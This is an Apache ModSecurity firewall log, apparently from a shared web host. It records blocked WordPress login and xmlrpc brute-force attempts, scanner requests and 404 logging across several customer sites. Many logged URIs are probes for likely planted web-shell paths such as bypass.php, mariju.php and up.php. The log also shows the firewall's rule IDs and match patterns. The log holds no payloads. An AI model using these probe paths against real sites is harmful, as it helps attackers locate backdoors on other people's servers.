[Tue May 26 13:51:57.759047 2026] [security2:error] [pid 555743:tid 555968] [client 31.57.184.107:52144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "homesehouse.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVYJcjqAquC0YaxQjC51QAAAWk"], referer: https://t.co/
[Tue May 26 13:51:57.871812 2026] [security2:error] [pid 555743:tid 555901] [client 91.230.225.175:20227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 175.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/item.php"] [unique_id "ahVYJcjqAquC0YaxQjC52wAAASY"]
[Tue May 26 13:51:58.162043 2026] [security2:error] [pid 560287:tid 560455] [client 120.231.175.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVYJpmX5s6sDS3wJVcamAAAAKg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460192&
[Tue May 26 13:51:58.535956 2026] [security2:error] [pid 555743:tid 555976] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYJsjqAquC0YaxQjC54gAAAXE"]
[Tue May 26 13:51:58.718867 2026] [security2:error] [pid 555743:tid 555988] [client 185.92.25.94:27567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/function/function.php"] [unique_id "ahVYJsjqAquC0YaxQjC58AAAAX0"]
[Tue May 26 13:51:59.826492 2026] [security2:error] [pid 555743:tid 555971] [client 185.192.71.239:46177] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 239.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/SimplePie/index.php"] [unique_id "ahVYJ8jqAquC0YaxQjC6BQAAAWw"]
[Tue May 26 13:52:00.262572 2026] [security2:error] [pid 555743:tid 555963] [client 91.230.225.173:29999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 173.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/images/admin.php"] [unique_id "ahVYKMjqAquC0YaxQjC6CwAAAWQ"]
[Tue May 26 13:52:00.693846 2026] [security2:error] [pid 555743:tid 555876] [client 185.192.71.238:21567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 238.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/theme-compat/about.php"] [unique_id "ahVYKMjqAquC0YaxQjC6FwAAAQ0"]
[Tue May 26 13:52:01.147504 2026] [security2:error] [pid 555743:tid 555981] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYKMjqAquC0YaxQjC6GgAAAXY"]
[Tue May 26 13:52:01.213225 2026] [security2:error] [pid 560287:tid 560429] [client 185.92.25.137:42325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/about/function.php"] [unique_id "ahVYKZmX5s6sDS3wJVcaygAAAJA"]
[Tue May 26 13:52:01.677708 2026] [security2:error] [pid 555743:tid 555933] [client 185.192.71.231:48775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/Requests/index.php"] [unique_id "ahVYKcjqAquC0YaxQjC6MgAAAUY"]
[Tue May 26 13:52:02.107779 2026] [security2:error] [pid 555743:tid 555977] [client 185.192.71.244:59157] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/ID3/about.php/wp-content/x/index.php"] [unique_id "ahVYKsjqAquC0YaxQjC6QQAAAXI"]
[Tue May 26 13:52:02.220546 2026] [security2:error] [pid 555743:tid 555889] [client 129.222.147.134:53230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYKsjqAquC0YaxQjC6SAAAARo"]
[Tue May 26 13:52:02.230929 2026] [security2:error] [pid 555743:tid 555889] [client 129.222.147.134:53230] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYKsjqAquC0YaxQjC6SAAAARo"]
[Tue May 26 13:52:02.573349 2026] [security2:error] [pid 555743:tid 555971] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYKsjqAquC0YaxQjC6RAAAAWw"]
[Tue May 26 13:52:02.615836 2026] [security2:error] [pid 560287:tid 560490] [client 91.230.225.166:37807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 166.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahVYKpmX5s6sDS3wJVca0wAAAMk"]
[Tue May 26 13:52:02.965406 2026] [security2:error] [pid 560287:tid 560432] [client 185.92.25.136:47823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/languages/404.php"] [unique_id "ahVYKpmX5s6sDS3wJVca1gAAAJM"]
[Tue May 26 13:52:03.086667 2026] [security2:error] [pid 555743:tid 555985] [client 106.192.248.115:51711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYK8jqAquC0YaxQjC6WwAAAXo"]
[Tue May 26 13:52:03.087514 2026] [security2:error] [pid 555743:tid 555985] [client 106.192.248.115:51711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYK8jqAquC0YaxQjC6WwAAAXo"]
[Tue May 26 13:52:03.418287 2026] [security2:error] [pid 560287:tid 560527] [client 185.92.25.108:57241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 108.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/update/403.php"] [unique_id "ahVYK5mX5s6sDS3wJVca2wAAAO0"]
[Tue May 26 13:52:03.940402 2026] [security2:error] [pid 560287:tid 560452] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYK5mX5s6sDS3wJVca4AAAAKY"]
[Tue May 26 13:52:04.109696 2026] [security2:error] [pid 555743:tid 555910] [client 185.192.71.228:24045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/default.php"] [unique_id "ahVYLMjqAquC0YaxQjC6cQAAAS8"]
[Tue May 26 13:52:04.281006 2026] [security2:error] [pid 555743:tid 555852] [remote 167.71.130.119:33544] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVYLMjqAquC0YaxQjC6cAABWWw"]
[Tue May 26 13:52:04.467202 2026] [security2:error] [pid 555743:tid 555988] [client 185.92.25.95:25943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/assets/info.php"] [unique_id "ahVYLMjqAquC0YaxQjC6fgAAAX0"]
[Tue May 26 13:52:04.888939 2026] [security2:error] [pid 555743:tid 555974] [client 185.192.71.226:34097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/class.api.php"] [unique_id "ahVYLMjqAquC0YaxQjC6iAAAAW8"]
[Tue May 26 13:52:05.415721 2026] [security2:error] [pid 555743:tid 555955] [client 185.192.71.243:64269] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 243.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/fonts/index.php"] [unique_id "ahVYLcjqAquC0YaxQjC6mQAAAVw"]
[Tue May 26 13:52:05.798726 2026] [security2:error] [pid 555743:tid 555879] [client 185.192.71.233:47603] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-admin/chosen.php"] [unique_id "ahVYLcjqAquC0YaxQjC6oQAAARA"]
[Tue May 26 13:52:05.850610 2026] [security2:error] [pid 555743:tid 555905] [client 120.231.175.199:51671] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.175.231.120.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahVYLcjqAquC0YaxQjC6oAAAASo"], referer: https://anujtradingco.com
[Tue May 26 13:52:06.565009 2026] [security2:error] [pid 560287:tid 560518] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYLpmX5s6sDS3wJVca7wAAAOQ"]
[Tue May 26 13:52:07.237527 2026] [security2:error] [pid 555743:tid 555998] [client 185.92.25.137:35495] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/autoload_classmap/bypass.php"] [unique_id "ahVYL8jqAquC0YaxQjC6ugAAAYc"]
[Tue May 26 13:52:07.511395 2026] [security2:error] [pid 555743:tid 555993] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYL8jqAquC0YaxQjC6uQAAAYI"]
[Tue May 26 13:52:07.754216 2026] [security2:error] [pid 555743:tid 555966] [client 85.204.70.118:36564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "preetishah.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVYL8jqAquC0YaxQjC6wwAAAWc"]
[Tue May 26 13:52:08.474497 2026] [security2:error] [pid 560287:tid 560535] [client 85.204.70.118:36580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVYMJmX5s6sDS3wJVcbCQAAAPU"]
[Tue May 26 13:52:08.758318 2026] [security2:error] [pid 560287:tid 560484] [client 74.249.173.207:38982] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "unsobered.moes-art.com"] [uri "/wk/index.php"] [unique_id "ahVYMJmX5s6sDS3wJVcbDwAAAMM"]
[Tue May 26 13:52:09.685271 2026] [security2:error] [pid 560287:tid 560521] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYMZmX5s6sDS3wJVcbFgAAAOc"]
[Tue May 26 13:52:10.956850 2026] [security2:error] [pid 560287:tid 560476] [client 93.114.137.235:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVYMZmX5s6sDS3wJVcbGwAAALw"]
[Tue May 26 13:52:11.041534 2026] [security2:error] [pid 555743:tid 555947] [client 85.204.70.118:36588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVYM8jqAquC0YaxQjC69gAAAVQ"]
[Tue May 26 13:52:11.041692 2026] [security2:error] [pid 555743:tid 555947] [client 85.204.70.118:36588] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVYM8jqAquC0YaxQjC69gAAAVQ"]
[Tue May 26 13:52:11.089436 2026] [security2:error] [pid 555743:tid 555827] [remote 40.77.167.55:20597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "api.lagoslawntennisclub1895.com"] [uri "/api/v1/website_banner_listing.php"] [unique_id "ahVYM8jqAquC0YaxQjC69QABSlM"], referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 13:52:11.255700 2026] [security2:error] [pid 560287:tid 560313] [remote 88.198.91.116:36894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.91.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVYM5mX5s6sDS3wJVcbMwABBBk"]
[Tue May 26 13:52:11.509032 2026] [security2:error] [pid 555743:tid 555988] [client 185.92.25.94:39913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 94.25.92.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/dropdown.php"] [unique_id "ahVYM8jqAquC0YaxQjC6_wAAAX0"]
[Tue May 26 13:52:11.585966 2026] [security2:error] [pid 560287:tid 560448] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYM5mX5s6sDS3wJVcbNQAAAKI"]
[Tue May 26 13:52:11.642996 2026] [security2:error] [pid 560287:tid 560444] [client 85.204.70.118:38268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVYM5mX5s6sDS3wJVcbOQAAAJ4"]
[Tue May 26 13:52:11.643109 2026] [security2:error] [pid 560287:tid 560444] [client 85.204.70.118:38268] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVYM5mX5s6sDS3wJVcbOQAAAJ4"]
[Tue May 26 13:52:11.895728 2026] [security2:error] [pid 555743:tid 555757] [remote 212.224.100.2:26092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.100.224.212.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVYM8jqAquC0YaxQjC7BAABYw0"]
[Tue May 26 13:52:12.011772 2026] [security2:error] [pid 560287:tid 560531] [client 91.230.225.172:58503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.225.230.91.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/images/admin.php"] [unique_id "ahVYNJmX5s6sDS3wJVcbPgAAAPE"]
[Tue May 26 13:52:12.366336 2026] [security2:error] [pid 555743:tid 555896] [client 185.192.71.231:36537] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 231.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/db.php"] [unique_id "ahVYNMjqAquC0YaxQjC7CgAAASE"]
[Tue May 26 13:52:12.717658 2026] [security2:error] [pid 555743:tid 555990] [client 185.192.71.235:46731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/.well-known/pki-validation/mariju.php"] [unique_id "ahVYNMjqAquC0YaxQjC7EwAAAX8"]
[Tue May 26 13:52:12.972204 2026] [security2:error] [pid 555743:tid 555888] [client 172.202.117.213:51102] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "208.91.198.85"] [uri "/cgi-sys/404.html"] [unique_id "ahVYNMjqAquC0YaxQjC7FgAAARk"]
[Tue May 26 13:52:13.130300 2026] [security2:error] [pid 560287:tid 560437] [client 185.192.71.240:39401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/mah/function.php"] [unique_id "ahVYNZmX5s6sDS3wJVcbSAAAAJg"]
[Tue May 26 13:52:13.432416 2026] [security2:error] [pid 560287:tid 560535] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYNZmX5s6sDS3wJVcbRwAAAPU"]
[Tue May 26 13:52:13.783455 2026] [security2:error] [pid 560287:tid 560446] [client 45.148.10.174:56910] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYNZmX5s6sDS3wJVcbWQAAAKA"]
[Tue May 26 13:52:13.841969 2026] [security2:error] [pid 560287:tid 560495] [client 106.192.248.115:52024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYNZmX5s6sDS3wJVcbWAAAAM4"]
[Tue May 26 13:52:14.525906 2026] [security2:error] [pid 560287:tid 560486] [client 45.148.10.174:56924] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYNpmX5s6sDS3wJVcbZAAAAMU"]
[Tue May 26 13:52:14.543129 2026] [security2:error] [pid 560287:tid 560458] [client 185.192.71.226:38809] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/plugins/bypass.php"] [unique_id "ahVYNpmX5s6sDS3wJVcbZQAAAKs"]
[Tue May 26 13:52:14.622579 2026] [security2:error] [pid 560287:tid 560513] [client 129.222.147.134:48763] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYNpmX5s6sDS3wJVcbYwAAAN8"]
[Tue May 26 13:52:14.622752 2026] [security2:error] [pid 560287:tid 560513] [client 129.222.147.134:48763] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVYNpmX5s6sDS3wJVcbYwAAAN8"]
[Tue May 26 13:52:14.984289 2026] [security2:error] [pid 555743:tid 555993] [client 185.192.71.236:47831] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-includes/admin.php"] [unique_id "ahVYNsjqAquC0YaxQjC7MwAAAYI"]
[Tue May 26 13:52:15.064243 2026] [security2:error] [pid 555743:tid 556000] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVYNsjqAquC0YaxQjC7LgAAAYk"]
[Tue May 26 13:52:15.149511 2026] [security2:error] [pid 555743:tid 555914] [client 45.148.10.174:56944] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVYN8jqAquC0YaxQjC7NgAAATM"]
[Tue May 26 13:52:15.362461 2026] [security2:error] [pid 555743:tid 555954] [client 185.192.71.241:48139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 241.71.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "svijaykumar.in"] [uri "/wp-content/themes/tflow/up.php"] [unique_id "ahVYN8jqAquC0YaxQjC7OQAAAVs"]
[Tue May 26 13:52:15.416989 2026] [security2:error] [pid 560287:tid 560495] [client 106.192.248.115:52024] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVYNZmX5s6sDS3wJVcbWAAAAM4"]
